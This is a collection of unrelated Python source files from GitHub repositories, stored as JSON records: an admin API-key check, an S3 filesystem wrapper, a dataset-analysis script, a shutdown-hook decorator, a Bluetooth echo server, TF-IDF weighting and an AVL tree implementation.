\"get-api-key\":\n organization_id = is_admin_user(json_data)\n api_key: str = json_data.get('api_key')\n return api_keys_view.get_api_key(api_key=api_key, organization_id=organization_id)\n\n\ndef is_admin_user(json_data):\n organization_id: str = json_data.get('organization_id')\n uid: str = json_data.get('uid')\n compare_uid: bool = hmac.compare_digest(uid, config_instance.ADMIN_UID)\n compare_org: bool = hmac.compare_digest(organization_id, config_instance.ORGANIZATION_ID)\n if not (compare_org and compare_uid):\n message: str = 'User Not Authorized: you cannot perform this action'\n raise UnAuthenticatedError(status=error_codes.access_forbidden_error_code, description=message)\n return organization_id\n","repo_name":"Memberships-Affiliate-Management-API/membership_and_affiliate_api","sub_path":"_api/admin_api/api/apikeys/apikeys.py","file_name":"apikeys.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"15765400324","text":"import functools\nimport io\nimport os\nimport threading\nimport time\nimport logging\n\nfrom .filesystem_interface import FileSystem\nfrom .close_protected_stream import CloseProtectedStream\n\n\ndef retryIfIrrelevantFailure(f):\n @functools.wraps(f)\n def inner(*args, **kwargs):\n slowdownAmount = 0.5\n\n while True:\n try:\n return f(*args, **kwargs)\n except Exception as e:\n if \"An error occurred (SlowDown)\" in str(e):\n pass\n elif \"Could not connect to the endpoint URL\" in str(e):\n pass\n elif \"InternalError\" in str(e):\n pass\n elif \"Connection reset by peer\" in str(e):\n pass\n elif \"Remote end closed connection without response\" in str(e):\n pass\n elif \"reached max retries\" in str(e):\n pass\n elif \"Service Unavailable\" in str(e):\n pass\n else:\n raise\n\n logging.warning(\"Error connecting to s3. Trying again.\")\n time.sleep(slowdownAmount)\n slowdownAmount = min(10, slowdownAmount * 1.5)\n\n return inner\n\n\nclass S3FileSystem(FileSystem):\n def __init__(self, bucketname: str, keyPrefix: str, accessKey=None, secretKey=None):\n super().__init__()\n self._accessKey = accessKey\n self._secretKey = secretKey\n\n self._keyPrefix = \"\"\n self._bucketname = bucketname\n\n self._boto_thread_local = threading.local()\n # check that bucket exists\n if not self.isdir(\"\"):\n raise Exception(f\"S3 Bucket {bucketname} does not exist or cannot be acessed.\")\n\n # check that the keyPrefix is a valid directory in the given bucket\n self._keyPrefix = self.withTrailingSep(keyPrefix)\n if not self.isdir(\"\"):\n raise Exception(f\"S3 prefix {keyPrefix} is not a directory in bucket {bucketname}\")\n\n def __getstate__(self):\n \"\"\"Control how pickle serializes instances.\n\n _boto_thread_local is not serializeable and should be re-initialized\n \"\"\"\n state = self.__dict__.copy()\n\n del state[\"_boto_thread_local\"]\n\n return state\n\n def __setstate__(self, state):\n \"\"\"Control how pickle deserializes instances.\"\"\"\n self.__dict__.update(state)\n self._boto_thread_local = threading.local()\n\n @property\n def keyPrefix(self):\n return self._keyPrefix\n\n @property\n def bucketname(self):\n return self._bucketname\n\n def __eq__(self, other):\n if not isinstance(other, S3FileSystem):\n return False\n if self._bucketname != other._bucketname:\n return False\n if self._keyPrefix != other._keyPrefix:\n return False\n if self._accessKey != other._accessKey:\n return False\n if self._secretKey != other._secretKey:\n return False\n return True\n\n def __hash__(self):\n return hash(\n (\n \"S3FileSystem\",\n self._bucketname,\n self._keyPrefix,\n self._accessKey,\n self._secretKey,\n )\n )\n\n def _pathToKey(self, path):\n \"\"\"Translate FileSystem path to S3 bucket key.\"\"\"\n path = self._stripSeps(path)\n if path == \"\":\n key = self.withTrailingSep(self._keyPrefix)\n else:\n key = self.joinPaths(self._keyPrefix, path)\n\n if not key.startswith(self._keyPrefix):\n raise OSError(f\"Unsafe path detected: '{path}' [not under '{self._keyPrefix}']\")\n\n return key\n\n def _keyToPath(self, key):\n \"\"\"Translate S3 key to FileSystem path.\"\"\"\n if not key.startswith(self._keyPrefix):\n raise OSError(f\"Invalid key: '{key}' [doesn't start with '{self._keyPrefix}'\")\n return key[len(self._keyPrefix) :]\n\n def _makeSessionAndClient(self):\n if not hasattr(self._boto_thread_local, \"client\"):\n self._boto_thread_local.client = {}\n self._boto_thread_local.session = {}\n self._boto_thread_local.bucket = {}\n\n accessKey = 
self._accessKey\n secretKey = self._secretKey\n\n kwargs = {}\n if accessKey is not None and accessKey != \"\":\n kwargs[\"aws_access_key_id\"] = accessKey\n kwargs[\"aws_secret_access_key\"] = secretKey\n\n # I can't see how to pass this into boto3 direclty because it's so\n # poorly documented. We need this to ensure we can actually download everything.\n os.environ[\"AWS_METADATA_SERVICE_NUM_ATTEMPTS\"] = \"10\"\n os.environ[\"AWS_METADATA_SERVICE_TIMEOUT\"] = \"2\"\n\n import boto3\n\n session = boto3.session.Session(**kwargs)\n self._boto_thread_local.session[accessKey] = session\n self._boto_thread_local.client[accessKey] = session.client(\"s3\")\n\n def _getClient(self):\n if (\n not hasattr(self._boto_thread_local, \"client\")\n or self._accessKey not in self._boto_thread_local.client\n ):\n self._makeSessionAndClient()\n\n return self._boto_thread_local.client[self._accessKey]\n\n def _getSession(self):\n if (\n not hasattr(self._boto_thread_local, \"session\")\n or self._accessKey not in self._boto_thread_local.session\n ):\n self._makeSessionAndClient()\n\n return self._boto_thread_local.session[self._accessKey]\n\n def _getBucket(self):\n key = (self._bucketname, self._accessKey)\n session = self._getSession()\n\n if key not in self._boto_thread_local.bucket:\n self._boto_thread_local.bucket[key] = session.resource(\"s3\").Bucket(\n self._bucketname\n )\n\n return self._boto_thread_local.bucket[key]\n\n def exists(self, path) -> bool:\n return self.isfile(path) or self.isdir(path)\n\n def isdir(self, path) -> bool:\n # In S3 a path can simultaneously be a file and a dir\n path = self._stripSeps(path)\n\n key = self.withTrailingSep(self._pathToKey(path))\n keysWithPrefix = self._listprefix(key)\n # If path is a not a dir, keysWithPrefix will be empty.\n # Unfortunately we cannot take len() without wrapping keysWithPrefix\n # in a list(), which could cause a lot of data transfer, if it hasn't\n # all been fetched yet. 
But we can use .limit(1) to say we just want\n # one result.\n try:\n length = len(list(keysWithPrefix.limit(1)))\n except Exception:\n return False\n else:\n return True if length > 0 or path == \"\" else False\n\n def _loadIt(self, path):\n key = self._pathToKey(path)\n\n @retryIfIrrelevantFailure\n def loadIt():\n o = self._getBucket().Object(key)\n o.load() # make sure the object exists\n return o\n\n return loadIt()\n\n def isfile(self, path) -> bool:\n # In S3 a path can simultaneously be a file and a dir\n try:\n self._loadIt(path)\n\n except Exception:\n return False\n\n return True\n\n def getmtime(self, path) -> float:\n try:\n o = self._loadIt(path)\n\n except Exception as e:\n logging.exception(\"Failed to load s3 object in getmtime\")\n raise OSError(f\"File not accessible: '{path}'\") from e\n\n return o.last_modified.timestamp()\n\n def getsize(self, path) -> int:\n \"\"\"Return the size in bytes of path.\n\n Raise OSError if the file does not exist or is inaccessible.\n \"\"\"\n try:\n o = self._loadIt(path)\n\n except Exception as e:\n logging.exception(\"Failed to load s3 object in getsize\")\n raise OSError(f\"File not accessible: '{path}'\") from e\n\n return o.content_length\n\n def stat(self, path):\n try:\n o = self._loadIt(path)\n\n except Exception as e:\n logging.exception(\"Failed to load s3 object in stat\")\n raise OSError(f\"File not accessible: '{path}'\") from e\n\n return {\"modtime\": o.last_modified.timestamp(), \"size\": o.content_length}\n\n def _listprefix(self, prefix):\n \"\"\"return a collection of ObjectSummary objects that start with prefix\n\n Some notes on how the optional args of Bucket.objects.filter work,\n because couldn't find sufficient docs and did some manual trying:\n - Prefix: works as expected: drop any entry if not key.startswith(Prefix)\n - Delimiter: it appears to be dropping entries if Delimiter in key\n - Marker: return an entry only if it is lexicographically after Marker\n \"\"\"\n assert prefix.startswith(self._keyPrefix), (prefix, self._keyPrefix)\n\n return self._getBucket().objects.filter(Prefix=prefix)\n\n def iterateFiles(self, prefix=\"\", subpathFilter=None, returnModtimesAndSizes=False):\n \"\"\"Returns a list of all the files that start with the given prefix.\n\n Directories are not returned.\n\n Note: Implementations of the FileSystem interface should\n override the implementation if it can be done more efficiently.\n\n If 'subpathFilter' is passed, then at each subdirectory, we will call the\n function and if it returns False, we will skip that directory. 
subpathFilter\n must also accept paths that return files.\n\n If 'returnModtimesAndSizes', then return pairs of (key, modTimestamp, fileSize).\n \"\"\"\n for path in self.iterateObjects(\n prefix=prefix,\n subpathFilter=subpathFilter,\n returnModtimesAndSizes=returnModtimesAndSizes,\n ):\n yield path\n\n def iterateObjects(\n self,\n prefix=\"\",\n subpathFilter=None,\n returnModtimesAndSizes=False,\n recursive=True,\n includeDirs=False,\n ):\n if includeDirs and returnModtimesAndSizes:\n raise Exception(\"includeDirs and returnModtimesAndSizes cannot both be True\")\n\n prefix = prefix.lstrip(FileSystem.sep)\n\n searchedPrefix = self._pathToKey(prefix)\n\n if subpathFilter is None and recursive and not includeDirs:\n objects = self._listprefix(searchedPrefix)\n\n for o in objects:\n if o.key.startswith(searchedPrefix):\n if returnModtimesAndSizes:\n yield (self._keyToPath(o.key), o.last_modified.timestamp(), o.size)\n else:\n yield self._keyToPath(o.key)\n else:\n client = self._getClient()\n paginator = client.get_paginator(\"list_objects\")\n\n for result in paginator.paginate(\n Bucket=self._bucketname,\n Delimiter=\"/\",\n Prefix=searchedPrefix + (\"/\" if prefix[-1:] == \"/\" else \"\"),\n ):\n for key in result.get(\"Contents\") or []:\n path = self._keyToPath(key[\"Key\"])\n if subpathFilter is None or subpathFilter(path):\n if returnModtimesAndSizes:\n yield path, key[\"LastModified\"].timestamp(), key[\"Size\"]\n else:\n yield path\n\n for commonPrefix in result.get(\"CommonPrefixes\") or []:\n subdir = commonPrefix.get(\"Prefix\").rstrip(FileSystem.sep)\n path = self._keyToPath(subdir)\n if subpathFilter is None or subpathFilter(path):\n if includeDirs:\n yield path\n\n if recursive:\n if self.withTrailingSep(path) != prefix:\n for path in self.iterateObjects(\n prefix=self.withTrailingSep(path),\n subpathFilter=subpathFilter,\n returnModtimesAndSizes=returnModtimesAndSizes,\n recursive=True,\n includeDirs=includeDirs,\n ):\n yield path\n\n def listFiles(self, prefix=\"\"):\n return list(self.iterateFiles(prefix=prefix))\n\n def listdir(self, path=\"\", *, recursive=False, maxEntries=None):\n path = self.withTrailingSep(path)\n prefix = self.withTrailingSep(self._pathToKey(path))\n keysWithPrefix = self._listprefix(prefix)\n\n if path != \"\" and len(list(keysWithPrefix.limit(1))) == 0:\n # Look at isdir for an explanation of the 2nd part of the condition\n raise OSError(f\"Not a directory '{path}'\")\n\n if maxEntries is None:\n return [\n obj\n for obj in self.iterateObjects(\n prefix=path, recursive=recursive, includeDirs=True\n )\n ]\n\n else:\n keys = []\n for obj in self.iterateObjects(prefix=path, recursive=recursive, includeDirs=True):\n keys.append(obj)\n if len(keys) >= maxEntries:\n break\n\n return keys\n\n def get(self, path) -> bytes:\n try:\n self._loadIt(path)\n except Exception as e:\n raise OSError(f\"File not accessible: '{path}'\") from e\n\n data = io.BytesIO()\n key = self._pathToKey(path)\n self._getInto(key, data)\n return data.getvalue()\n\n def getInto(self, path, byteStream):\n try:\n self._loadIt(path)\n except Exception as e:\n raise OSError(f\"File not accessible: '{path}'\") from e\n\n self._checkByteStreamForGet(byteStream)\n\n key = self._pathToKey(path)\n self._getInto(key, byteStream)\n\n @retryIfIrrelevantFailure\n def _getInto(self, key, byteStream):\n byteStream.seek(0)\n self._getClient().download_fileobj(self._bucketname, key, byteStream)\n\n @retryIfIrrelevantFailure\n def set(self, path, content) -> None:\n 
self._checkContentInputTypeForSet(content)\n\n key = self._pathToKey(path)\n if isinstance(content, bytes):\n byteStream = CloseProtectedStream(io.BytesIO(content))\n\n else:\n assert isinstance(content, io.IOBase), type(content)\n\n byteStream = CloseProtectedStream(content)\n self._checkByteStreamForSet(byteStream)\n\n try:\n self._setByteStream(key, byteStream)\n except Exception as e:\n raise OSError(f\"Failed to set {path} with error {str(e)}\") from e\n\n def _setByteStream(self, key, byteStream):\n byteStream.seek(0, io.SEEK_END)\n byteStream.seek(0)\n self._getClient().upload_fileobj(byteStream, Bucket=self._bucketname, Key=key)\n\n def rm(self, path) -> None:\n try:\n o = self._loadIt(path)\n except Exception as e:\n raise OSError(f\"Failed not accessible: '{path}'\") from e\n\n @retryIfIrrelevantFailure\n def deleteIt():\n o.delete()\n\n try:\n deleteIt()\n\n except Exception as e:\n raise OSError(str(e)) from e\n\n def __str__(self):\n return f\"S3FileSystem(bucket={self._bucketname}, keyPrefix={self._keyPrefix})\"\n","repo_name":"APrioriInvestments/filesystem","sub_path":"filesystem/s3_filesystem.py","file_name":"s3_filesystem.py","file_ext":"py","file_size_in_byte":15393,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"5626306060","text":"import math\nfrom typing import List\n\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom pandas import DataFrame\n\ndef info(df: pd.DataFrame, sub_df: pd.DataFrame, target_name: str) -> float:\n if df[target_name].nunique() == 0:\n return 0\n interval_count = 1 + int(math.log(df[target_name].nunique(), 2))\n left_border = df[target_name].min()\n right_border = df[target_name].max()\n step = (right_border - left_border) / interval_count\n\n vals_in_interval = [0] * interval_count\n value_counts = sub_df[target_name].value_counts()\n unq_vals = list(value_counts.index)\n if step != 0:\n for i in range(len(unq_vals)):\n interval_index = int((unq_vals[i] - left_border) // step)\n if interval_index == interval_count:\n interval_index -= 1\n vals_in_interval[interval_index] += value_counts[unq_vals[i]]\n\n s = 0.0\n for val in value_counts:\n tmp = val / sub_df[target_name].count()\n if tmp != 0:\n s += tmp * math.log(tmp, 2)\n return -s\n\n\ndef info_a(df: pd.DataFrame, attr_name: str, target_name: str) -> float:\n if df[attr_name].nunique() == 0:\n return 0\n interval_count = 1 + int(math.log(df[attr_name].nunique(), 2))\n left_border = df[attr_name].min()\n right_border = df[attr_name].max()\n step = (right_border - left_border) / interval_count\n left_borders = []\n for i in range(interval_count):\n left_borders.append(left_border + i * step)\n\n s = 0.0\n for border in left_borders:\n sub_df = df.loc[((df[attr_name] >= border) & (df[attr_name] < border + step)) |\n (df[attr_name] == right_border)]\n s += info(df, sub_df, target_name)\n return s\n\n\ndef split_info(df: pd.DataFrame, attr_name: str) -> float:\n s = 0.0\n for val in df[attr_name].value_counts():\n tmp = val / df[attr_name].count()\n s += tmp * math.log(tmp, 2)\n return s\n\n\ndef gain(df: pd.DataFrame, attr_name: str, target_name: str) -> float:\n return info(df, df, target_name) - info_a(df, attr_name, target_name)\n\n\ndef gain_ratio(df: pd.DataFrame, attr_name: str, target_name: str) -> float:\n return gain(df, attr_name, target_name) / split_info(df, attr_name)\n\ndef data_set_gain_ratio(df: pd.DataFrame, target_name: str, num_target_columns: int) -> pd.Series:\n gain_ratio_list = []\n for col_name in df.columns[0:-num_target_columns]:\n gain_ratio_list.append(gain_ratio(df, col_name, target_name))\n return pd.Series(gain_ratio_list, index=df.columns[0:-num_target_columns])\n\nPRINT_ALLOWED = True\nMAX_MISSES_PERCENTS = 45\nCOLS = 1\nROWS = 0\n\n\ndef show_corr(df: DataFrame):\n width = 30\n height = 10\n sns.set(rc={'figure.figsize': (width, height)})\n sns.heatmap(df.corr(), annot=True, linewidths=3, cbar=False)\n plt.show()\n\n\ndef show_distributions(df: DataFrame, df_stat: DataFrame):\n for i in df.columns:\n plt.figure(i)\n sns.histplot(df[i], kde=True, stat=\"density\")\n interquantile_range = df_stat.loc['Interquantile range'][i]\n plt.axvline(df_stat.loc['Quantile 1'][i] - 1.5 * interquantile_range, color=\"indigo\", ls='--')\n plt.axvline(df_stat.loc['Quantile 1'][i], color=\"dodgerblue\", ls='--')\n plt.axvline(df_stat.loc['Average'][i], color=\"red\", ls='--')\n plt.axvline(df_stat.loc['Median'][i], color=\"goldenrod\", ls='--')\n plt.axvline(df_stat.loc['Quantile 3'][i], color=\"dodgerblue\", ls='--')\n plt.axvline(df_stat.loc['Quantile 3'][i] + 1.5 * interquantile_range, color=\"indigo\", ls='--')\n plt.show()\n\n\ndef get_data_frame() -> DataFrame:\n df = pd.read_excel('ID_data_mass_18122012.xlsx', 
sheet_name='VU', skiprows=[0,2])\n df = df.drop(['Unnamed: 0', 'Unnamed: 1'], axis=COLS)\n return df\n\n\ndef get_frame_statistics(df: DataFrame) -> DataFrame:\n col_len = len(df.index)\n col_filled_len = df.count()\n filled_part = ((col_len - col_filled_len) / col_len) * 100\n minimum = df.min()\n q1 = df.quantile(q=0.25, )\n average = df.mean()\n median = df.median()\n q3 = df.quantile(q=0.75, )\n maximum = df.max()\n standard_deviation = df.std()\n unique_count = df.nunique()\n interquantile_range = q3 - q1\n frame = pd.concat([col_filled_len, filled_part, minimum, q1, average, median, q3, maximum, standard_deviation,\n unique_count, interquantile_range], axis=1, join=\"inner\")\n frame = frame.T\n f = pd.DataFrame(frame)\n\n f.index = ['Count', 'Unfilled percentage', 'Minimum', 'Quantile 1', 'Average', 'Median', 'Quantile 3',\n 'Maximum', 'Standard deviation', 'Unique count', 'Interquantile range']\n return f\n\n\ndef remove_cols_with_many_misses(df: DataFrame, targets: list[str]) -> DataFrame:\n too_little_data_cols = []\n for col in df.columns:\n unfilled = df[col]['Unfilled percentage']\n if unfilled >= MAX_MISSES_PERCENTS and not targets.__contains__(col):\n too_little_data_cols.append(col)\n if PRINT_ALLOWED:\n print('Drop columns with many misses: ', too_little_data_cols)\n return df.drop(too_little_data_cols, axis=COLS)\n\n\ndef remove_cols_with_little_unique(df: DataFrame, targets: list[str]) -> DataFrame:\n too_little_unique_cols = []\n for col in df.columns:\n unique_count = df[col]['Unique count']\n if unique_count == 1 and not targets.__contains__(col):\n too_little_unique_cols.append(col)\n if PRINT_ALLOWED:\n print('Drop columns with little unique: ', too_little_unique_cols)\n return df.drop(too_little_unique_cols, axis=COLS)\n\n\ndef fill_blanks(df: DataFrame, df_stat: DataFrame, targets: List[str]) -> DataFrame:\n for col in df.columns:\n if col in targets:\n continue\n for i in df[col].keys():\n if df[col][i] is None or np.isnan(df[col][i]):\n df[col][i] = df_stat[col]['Median']\n return df\n\ndef combine_kgf(df: DataFrame) -> DataFrame:\n for row_num in df['КГФ.1'].keys():\n if not np.isnan(df['КГФ.1'][row_num]):\n df['КГФ'][row_num] = df['КГФ.1'][row_num] * 1000\n return df.drop('КГФ.1', axis=COLS)\n\n\ndef remove_empty_target(df: DataFrame, targets: List[str]) -> DataFrame:\n to_remove = []\n for i in df['КГФ'].keys():\n no_targets = True\n for col in targets:\n if not (df[col][i] is None or np.isnan(df[col][i])):\n no_targets = False\n if no_targets:\n to_remove.append(i)\n print(\"Drop \", len(to_remove), \" rows: \", to_remove)\n for row in to_remove:\n df = df.drop(row, axis=ROWS)\n return df\n\n\ndef show_gain_ratio(df: DataFrame, df_stat: DataFrame, target: str, targets: list[str]):\n df_igr = data_set_gain_ratio(df, target, len(targets)).to_frame()\n df_igr.plot(kind = 'barh')\n plt.show()\n\n\ndef main():\n mpl.use('TkAgg')\n pd.set_option('display.max_rows', None)\n pd.set_option('display.max_columns', None)\n pd.set_option('display.width', None)\n df = get_data_frame()\n df = combine_kgf(df)\n # print(df.describe())\n targets = ['G_total', 'КГФ']\n df_stat = get_frame_statistics(df)\n df_stat = remove_cols_with_many_misses(df_stat, targets)\n df_stat = remove_cols_with_little_unique(df_stat, targets)\n df = df.filter(items=df_stat)\n df = remove_empty_target(df, targets)\n df_stat = df_stat.filter(items=df)\n df = fill_blanks(df, df_stat, targets)\n # show_distributions(df, df_stat) # trash in Ro_c\n # df = df.drop(151, axis=ROWS)\n # show_corr(df)\n 
df_stat = get_frame_statistics(df)\n # show_corr(df)\n print(df_stat)\n # Рзаб and Рзаб1 have almost the same correlations\n # Also Руст and Руст1\n # By IGR defined that Руст.1 > Руст, Рзаб.1 > Рзаб, Дебит воды > Дебит воды.1\n df = df.drop(['Рзаб', 'Руст', 'Дебит воды.1'], axis=COLS)\n df_stat = df_stat.filter(items=df)\n\n df_g_total = df.drop(df[df['G_total'].isnull()].index)\n df_g_total_stat = get_frame_statistics(df_g_total)\n show_gain_ratio(df_g_total, df_g_total_stat, 'G_total', targets) # Рсб, Рсб.1\n df_kgf = df.drop(df[df['КГФ'].isnull()].index)\n df_kgf_stat = get_frame_statistics(df_kgf)\n show_gain_ratio(df_kgf, df_kgf_stat, 'КГФ', targets) # Рсб, Рсб.1\n # show_distributions(df, df_stat)\n df_stat = df_stat.filter(items=df)\n df.to_excel(\"result.xlsx\")\n df_stat.to_excel(\"statistics.xlsx\")\n # Рлин, Рсб .1\n df_1 = df.loc[[1, 2, 3, 24, 32]]\n df_2 = pd.merge(df, df_1, indicator=True, how='outer').query('_merge==\"left_only\"').drop('_merge', axis=1)\n\n df_1.to_csv('testing_dataset.csv')\n df_2.to_csv('training_dataset.csv')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MaximuSG140/neural-networks-labs","sub_path":"dataset_analysis/dataset_analysis.py","file_name":"dataset_analysis.py","file_ext":"py","file_size_in_byte":8839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"44249732251","text":"# coding:utf-8\nimport threading\n\n# 退出调用列表\n__exits__ = []\n# 原本退出的回调函数\n__old_shutdown__ = threading._shutdown\n\n\ndef waitexit(*kw, **kwargs):\n '''\n 该注解是给开发者使用的,修饰函数,并且传入参数\n :param kw: 传入参数\n :param kwargs: 传入键值对参数\n :return: 返回被装饰过的函数\n '''\n global __exits__\n\n def cut(func=None):\n # 一个回调对象,搞不好傻屌开发者可能会需要多个回调函数\n __exits__.append((func, kw, kwargs))\n return func\n\n return cut\n\n\ndef exit_callback():\n '''\n 该函数并不是给开发者用的\n :return:\n '''\n global __exits__\n global __old_shutdown__\n while __exits__:\n func, kw, kwargs = __exits__.pop()\n try:\n func(*kw, **kwargs)\n except:\n pass\n return __old_shutdown__()\n\n\n# 设置销毁回调\nsetattr(threading, \"_shutdown\", exit_callback)\n\nif __name__ == '__main__':\n @waitexit(\"qwertyuiopoiuytrew\")\n def exits(info=\"\"):\n print(\"这个傻屌py文件已经结束执行了\")\n print(\"最后传入的参数是:%s\" % info)\n\n","repo_name":"c0cc/lscore","sub_path":"lscore/libs/hook/exit_cut.py","file_name":"exit_cut.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"74953374915","text":"import bluetooth\r\nfrom socket import *\r\n#server\r\nhostMACAddress = '34:DE:1A:31:2B:52' # The MAC address of a Bluetooth adapter on the server. The server might have multiple Bluetooth adapters.\r\nport = 4\r\nbacklog = 1\r\nsize = 1024\r\ns = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\r\n# s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\r\ns.bind((hostMACAddress, port))\r\ns.listen(backlog)\r\ntry:\r\n client, clientInfo = s.accept()\r\n while 1:\r\n data = client.recv(size)\r\n if data:\r\n print(data)\r\n client.send(data) # Echo back to client\r\nexcept:\t\r\n print(\"Closing socket\")\r\n client.close()\r\n s.close()","repo_name":"ddhuy77/COSC2790_PIoT_Assignment_1","sub_path":"bluetooth2.py","file_name":"bluetooth2.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27522822603","text":"from docs import Dokumen\nimport math\nfrom collections import defaultdict\n\n\nclass PembobotanKata:\n def __init__(self):\n self.docs = Dokumen().documents_dictionary()\n self.N = len(self.docs)\n self.avg_len = sum([len(doc) for doc in self.docs.values()])/len(self.docs)\n self.inv_idx = Dokumen().inverted_index()\n\n def tf_idf_query(self, q_terms):\n fqt = {}\n for term in q_terms:\n fqt[term] = fqt.get(term, 0) + 1\n tf_idf_query = {}\n id = 1\n for term in fqt.keys():\n query_tf = math.log10(fqt[term]) + 1\n print(f'{id}. {term}')\n df = len(self.inv_idx[term])\n print(f'df = {df}')\n if df != 0:\n query_idf = math.log(self.N / df)\n id += 1\n tf_idf_query[term] = query_tf * query_idf\n return tf_idf_query\n\n def tf_idf_doc(self, term, docID):\n td = self.docs[docID].count(term)\n df = len(self.inv_idx[term]) # df is the number of documents a term occurs in\n tf = math.log10(td) + 1 # the frequency of the word t in document d\n idf = math.log(self.N/df)\n w = tf * idf\n return w\n\n def create_tf_idf(self):\n tf_idf = defaultdict(dict)\n for term in set(self.inv_idx.keys()):\n for docid in self.inv_idx[term]:\n tf_idf[term][docid] = self.tf_idf_doc(term, docid)\n return tf_idf\n","repo_name":"ErwinSputra/CLIR-QE","sub_path":"term_weighting.py","file_name":"term_weighting.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70310292994","text":"class Node(object):\n def __init__(self, data):\n self.data = data\n self.height = 0\n self.left_child = None\n self.right_child = None\n\n\nclass AVLTree(object):\n def __init__(self):\n self.root = None\n\n def calc_height(self, node):\n if node is None:\n return -1\n\n return node.height\n\n def calc_balance(self, node):\n \"\"\"\n if the return value is > 1 it means we have left heavy tree --> call right rotation\n if the return value is < -1 it means we have right heavy tree --> call left rotation\n note: sometimes it will require both left/right rotation and then right/left rotation\n \"\"\"\n if node is None:\n return 0\n return self.calc_height(node.left_child) - self.calc_height(node.right_child)\n\n def insert(self, data):\n self.root = self.__insert_node(data, self.root)\n\n def __insert_node(self, data, node):\n if node is None:\n return Node(data)\n\n # insert the new node\n if data < node.data:\n node.left_child = self.__insert_node(data, node.left_child)\n else:\n node.right_child = self.__insert_node(data, node.right_child)\n\n self.__update_node_height(node)\n\n # fix AVL property violation\n return self.__settle_violation(data, node)\n\n def __settle_violation(self, data, node):\n balance = self.calc_balance(node)\n\n # case 1 -> doubly left heavy situation\n if balance > 1 and data < node.left_child.data:\n print(\"Run doubly left heavy condition\")\n return self.__right_rotation(node)\n elif balance < -1 and data > node.right_child.data:\n print(\"Run doubly right heavy condition\")\n return self.__left_rotation(node)\n elif balance > 1 and data > node.left_child.data:\n print(\"Run left right heavy situation\")\n node.left_child = self.__left_rotation(node.left_child)\n return self.__right_rotation(node)\n elif balance < -1 and data < node.right_child.data:\n print(\"Run right left heavy situation\")\n node.right_child = self.__right_rotation(node.right_child)\n return self.__left_rotation(node)\n\n return node\n\n def __right_rotation(self, node):\n \"\"\"\n O(1) time complexity\n \"\"\"\n print(\"rotating to the right, node = \", node.data)\n temp_node = node.left_child\n t = temp_node.right_child\n\n temp_node.right_child = node\n node.left_child = t\n\n self.__update_node_height(node)\n self.__update_node_height(temp_node)\n\n return temp_node\n\n def __left_rotation(self, node):\n \"\"\"\n O(1) time complexity\n \"\"\"\n print(\"rotating to the left, node = \", node.data)\n temp_node = node.right_child\n t = temp_node.left_child\n\n temp_node.left_child = node\n node.right_child = t\n\n self.__update_node_height(node)\n self.__update_node_height(temp_node)\n\n return temp_node\n\n def travers(self):\n if self.root is not None:\n self.__travers_in_order(self.root)\n else:\n print(\"BST is empty\")\n\n def __travers_in_order(self, node):\n \"\"\"\n Left sub-tree -> root -> right sub-tree\n \"\"\"\n if node.left_child is not None:\n self.__travers_in_order(node.left_child)\n\n print(\"{}\".format(node.data))\n\n if node.right_child is not None:\n self.__travers_in_order(node.right_child)\n\n def remove(self, data):\n if self.root is not None:\n self.__remove_node(data, self.root)\n else:\n print(\"BST is empty\")\n\n def __remove_node(self, data, node):\n if node is None:\n return node\n\n if data < node.data:\n node.left_child = self.__remove_node(data, node.left_child)\n elif data > node.data:\n node.right_child = self.__remove_node(data, node.right_child)\n else:\n if node.left_child is None and node.right_child is None:\n 
print(\"removing a leaf node\")\n del node\n return None\n elif node.left_child is None:\n print(\"removing a node with right child\")\n temp_node = node.right_child\n del node\n return temp_node\n elif node.right_child is None:\n print(\"removing a node with left child\")\n temp_node = node.left_child\n del node\n return temp_node\n else:\n print(\"removing a node with children\")\n temp_node = self.__max(node.left_child)\n node.data = temp_node.data\n node.left = self.__remove_node(node.data, node.left_child)\n\n if node is None:\n return node\n\n self.__update_node_height(node)\n\n return self.__settle_violation(data, node)\n\n def __update_node_height(self, node):\n node.height = max(self.calc_height(node.left_child), self.calc_height(node.right_child)) + 1\n\n def __max(self, node):\n if node.right is not None:\n return self.__max(node.right)\n else:\n return node\n\n def __min(self, node):\n if node.left is not None:\n return self.__min(node.left)\n else:\n return node\n\n\nif __name__ == \"__main__\":\n tree = AVLTree()\n tree.insert(10)\n tree.insert(20)\n tree.insert(30)\n\n tree.travers()\n\n tree.insert(40)\n tree.insert(50)\n tree.insert(60)\n\n tree.travers()\n\n tree2 = AVLTree()\n tree2.insert(60)\n tree2.insert(50)\n tree2.insert(40)\n\n tree2.travers()\n\n tree2.insert(30)\n tree2.insert(20)\n tree2.insert(10)\n\n tree2.travers()\n\n tree3 = AVLTree()\n tree3.insert(50)\n tree3.insert(70)\n tree3.insert(60)\n\n tree3.travers()\n\n tree4 = AVLTree()\n tree4.insert(50)\n tree4.insert(30)\n tree4.insert(40)\n tree4.remove(30)\n\n tree4.travers()\n\n","repo_name":"avi3tal/knowledgebase","sub_path":"ds/Tree/AVLTree/avlt.py","file_name":"avlt.py","file_ext":"py","file_size_in_byte":6067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
